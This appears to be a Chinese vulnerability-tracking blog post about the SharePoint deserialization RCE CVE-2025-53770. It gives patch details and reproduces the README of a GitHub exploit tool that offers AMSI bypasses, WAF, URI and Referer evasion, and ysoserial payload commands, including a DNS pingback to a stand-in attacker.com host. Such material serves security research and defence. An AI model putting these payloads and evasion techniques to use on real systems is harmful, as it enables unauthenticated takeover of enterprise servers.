Microsoft SharePoint Server 反序列化漏洞

漏洞信息

漏洞名称: Microsoft SharePoint Server 反序列化漏洞

漏洞编号:

  • CVE: CVE-2025-53770

漏洞类型: 反序列化

漏洞等级: 严重

漏洞描述: 受影响产品: Microsoft SharePoint Server是一款广泛使用的企业级协作平台,支持文档管理、团队协作和业务流程自动化。它通常部署在企业内部网络中,用于内部和外部用户的协作。此次漏洞影响的是本地部署的SharePoint Server 2016、2019及订阅版,不包括SharePoint Online(M365)。

漏洞解释: 该漏洞是一个未经身份验证的远程代码执行(RCE)漏洞,存在于/_layouts/15/ToolPane.aspx中,由于对不受信任数据的反序列化处理不当导致。攻击者可以构造恶意请求,利用此漏洞在目标服务器上执行任意代码。漏洞的技术根源在于SharePoint Server在处理特定请求时未能正确验证和清理输入数据,从而导致反序列化漏洞被利用。

影响分析: 此漏洞的CVSS评分为9.8,属于严重级别。攻击者无需任何身份验证即可远程利用此漏洞,执行任意代码,完全控制受影响的系统。这可能导致数据泄露、服务中断、甚至在内部网络中横向移动。由于漏洞的利用可以自动化进行,且不需要用户交互,因此风险极高。微软已于2025年7月19日发布了补丁(如KB5002768、KB5002754)来修复此漏洞,并强烈建议所有受影响用户立即应用补丁。此外,CISA已将此次漏洞列入其已知被利用漏洞(KEV)目录,要求联邦机构在2025年7月21日前完成修补。

产品厂商: Microsoft

产品名称: SharePoint Server

影响版本: 2016, 2019, Subscription Edition

来源: https://github.com/exfil0/CVE-2025-53770

类型: CVE-2025:github search

仓库文件

  • README.md
  • divine_absolute.py
  • requirements.txt

来源概述

Divine Absolute - CVE-2025-53770 Exploit Tool

License
Python

Overview

Divine Absolute is a sophisticated, wizard-driven Python exploit tool targeting CVE-2025-53770, a critical (CVSS 9.8) unauthenticated remote code execution (RCE) vulnerability in on-premises Microsoft SharePoint Server (2016, 2019, Subscription Edition). This vulnerability, disclosed as a zero-day on July 19, 2025, stems from deserialization of untrusted data in /_layouts/15/ToolPane.aspx. The tool is designed for ethical penetration testing and authorized security research only, offering unparalleled precision, stealth, and adaptability for reconnaissance, exploitation, and verification.

Repository: https://github.com/exfil0/CVE-2025-53770

⚠️ Legal Warning: This tool is for lawful, authorized use only in controlled environments with explicit permission. Unauthorized use against systems you do not own or have permission to test is illegal and may result in severe legal consequences. The author assumes no liability for misuse.

Features

  • Modes:
    • Recon: Detects SharePoint presence, version, and ToolPane.aspx accessibility with advanced scoring and regex (e.g., 16.0.0.\d+-\w+?).
    • Exploit: Delivers payloads via ToolPane.aspx with robust bypasses.
    • Full: Combines recon and exploitation, with optional aggressive exploitation.
  • Payload Generation:
    • Integrates ysoserial.net for .NET deserialization payloads (e.g., ObjectDataProvider, LosFormatter).
    • Optional pythonnet for fallback HTTP/DNS pingback payloads (e.g., WebRequest.Create, Dns.GetHostEntry).
    • Supports GZIP compression with explicit encoding/decoding and base64 validation.
    • Injects AMSI bypasses (basic reflection, obfuscated, or custom snippets) into PowerShell commands, including base64-encoded (-enc) payloads.
  • Bypasses:
    • URI evasion: Random or fixed suffixes (e.g., /xp.aspx, UUID-based).
    • Referer spoofing: None, external domains (e.g., www.google.com), custom URLs, or internal SharePoint paths (e.g., /_layouts/15/sharepoint.aspx).
  • Stealth:
    • Adaptive rate limiting with a minimum RPS floor (0.01) and burst control.
    • Thread-safe concurrency with lock-protected pacing and jitter (0-0.1s).
  • Verification:
    • Robust RCE confirmation with compiled OR regexes, retries on RequestException, and customizable status codes/paths.
  • Reconnaissance:
    • Enhanced SharePoint detection via headers (e.g., MicrosoftSharePointTeamServices), paths (e.g., /versions.aspx), and regexes.
  • Output:
    • JSON results with forensic logging for analysis.
  • Usability:
    • Interactive wizard for easy configuration.
    • Supports Mono/Wine for ysoserial.net on non-Windows systems.
    • Proxy support (HTTP/SOCKS5) and customizable timeouts.

CVE-2025-53770 Context

  • Vulnerability: Unauthenticated RCE via deserialization in /_layouts/15/ToolPane.aspx.
  • Affected: SharePoint Server 2016, 2019, Subscription Edition (EOL 2010/2013 also vulnerable).
  • Unaffected: SharePoint Online (M365).
  • Exploited: Since July 18, 2025, in campaigns like “ToolShell” by state-sponsored actors (e.g., Linen Typhoon).
  • Patches: Microsoft patches (e.g., KB5002768, KB5002754) released July 19, 2025, mitigate fully. CISA KEV listing mandates federal patching by July 21, 2025.
  • Mitigations: Patch, rotate keys post-patch, enable AMSI/Defender (Full Mode), monitor /ToolPane.aspx POSTs, use WAF rules (e.g., Cloudflare).

Installation

Prerequisites

  • Python 3.8+
  • Dependencies:
    1
    pip install requests termcolor
  • Optional (for .NET serialization fallback):
    1
    pip install pythonnet
  • ysoserial.net:
  • Mono/Wine (non-Windows systems):
    1
    2
    3
    4
    # Ubuntu/Debian
    sudo apt-get install mono-complete
    # macOS (via Homebrew)
    brew install mono
  • Docker Lab (recommended for testing):
    1
    docker pull mcr.microsoft.com/sharepoint/server:2019

Setup

  1. Clone the repository:
    1
    2
    git clone https://github.com/exfil0/CVE-2025-53770.git
    cd CVE-2025-53770
  2. Install Python dependencies:
    1
    pip install -r requirements.txt
  3. Ensure ysoserial.exe is accessible or provide its path during execution.
  4. (Optional) Verify Mono/Wine for non-Windows systems.

Usage

Run the interactive wizard:

1
python divine_absolute.py

Workflow

  1. Mode Selection:
    • Recon: Scans for SharePoint presence and version.
    • Exploit: Sends payload to ToolPane.aspx.
    • Full: Recon + exploit (optional aggressive mode).
  2. Target Input:
    • Single URL (e.g., https://sharepoint.example.com).
    • File with URLs (one per line).
  3. Payload Configuration:
    • ysoserial.net: Specify path, gadget (e.g., ObjectDataProvider), and command (e.g., cmd /c whoami).
    • File: Load base64 GZIP payload from file.
    • String: Input base64 GZIP payload directly.
    • Pingback: Generate HTTP/DNS pingback (e.g., http://attacker.com/callback or sub.attacker.com).
    • AMSI bypass: Choose NONE, BASIC_REFLECTION, CONCAT_OBFUSCATED, or custom snippet.
  4. Bypass Options:
    • URI: NONE, FIXED (e.g., /xp.aspx), RANDOM (UUID-based).
    • Referer: DEFAULT_SP, NO_REFERER, RANDOM_EXTERNAL, CUSTOM_URL.
  5. Network Settings:
    • Proxy (e.g., http://127.0.0.1:8080).
    • Threads, timeout, jitter, and rate limit (RPS).
  6. RCE Verification:
    • Specify path (e.g., /sitepages/result.txt), regexes (e.g., Xanthorox.*), status codes (e.g., 200,403), attempts, delay, and timeout.

Example Commands

  • Reconnaissance:
    1
    2
    python divine_absolute.py
    # Select: Mode=Recon, Target=https://sharepoint.example.com
  • Exploit with ysoserial.net:
    1
    2
    3
    4
    python divine_absolute.py
    # Select: Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
    #         ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
    #         Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
  • Full Mode with Verification:
    1
    2
    3
    python divine_absolute.py
    # Select: Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
    #         Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
  • DNS Pingback:
    1
    2
    python divine_absolute.py
    # Select: Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com

Output

Results are saved in xanthorox_results.json with fields:

  • target: URL tested.
  • sharepoint_detected: Boolean.
  • toolpane_accessible: Boolean.
  • exploited: Boolean (payload sent).
  • verified_rce: Boolean/None (RCE confirmed).
  • error: Any errors encountered.

Example:

1
2
3
4
5
6
7
8
9
10
[
  {
    "target": "https://sharepoint.example.com",
    "sharepoint_detected": true,
    "toolpane_accessible": true,
    "exploited": true,
    "verified_rce": true,
    "error": null
  }
]

Improvements Addressed

This version fixes:

  • Adaptive Rate Limiting: Ignores non-retry errors (e.g., 404) for success/error counts; enforces a minimum RPS floor (0.01).
  • AMSI Injection: Decodes and injects bypasses into base64-encoded PowerShell (-enc) commands; supports non-PowerShell (e.g., cmd.exe) with warnings.
  • Pingback Fallback: Uses pythonnet for reliable DNS pingback with Dns.GetHostEntry (experimental, requires gadget for full effect).

Testing Recommendations

  • Lab Setup: Use a SharePoint Server 2019 Docker container (unpatched) for safe testing.
  • WAF Testing: Validate bypasses against Cloudflare or similar WAFs with adaptive RPS.
  • Payload Testing: Generate payloads with ysoserial.exe -f LosFormatter -g ObjectDataProvider -c "cmd /c nslookup sub.attacker.com" -o base64 and verify DNS logs.

Known Limitations

  • Pingback Reliability: Dns.GetHostEntry in pythonnet may not trigger without a specific gadget chain.
  • Complex Commands: Non-standard PowerShell commands may require manual AMSI bypass injection.
  • WAF Detection: Some WAFs may block payloads despite bypasses; test thoroughly.

Contributing

Contributions are welcome! Please:

  1. Fork the repository.
  2. Create a feature branch (git checkout -b feature/awesome-improvement).
  3. Commit changes (git commit -m "Add awesome improvement").
  4. Push to the branch (git push origin feature/awesome-improvement).
  5. Open a pull request.

License

This project is licensed under the MIT License. See LICENSE for details.

Acknowledgments

  • xAI: For inspiring cutting-edge security research.
  • ysoserial.net Team: For the .NET deserialization payload generator.
  • Security Community: For insights into CVE-2025-53770 exploitation and mitigations.

Contact

Note: Always verify payloads and configurations in a controlled lab before use. Stay ethical, stay legal.

Github Poc
#反序列化 #CVE-2025:github search
Microsoft SharePoint Server 反序列化漏洞
http://example.com/2025/07/23/github_2613193353/
作者
lianccc
发布于
2025年7月23日
许可协议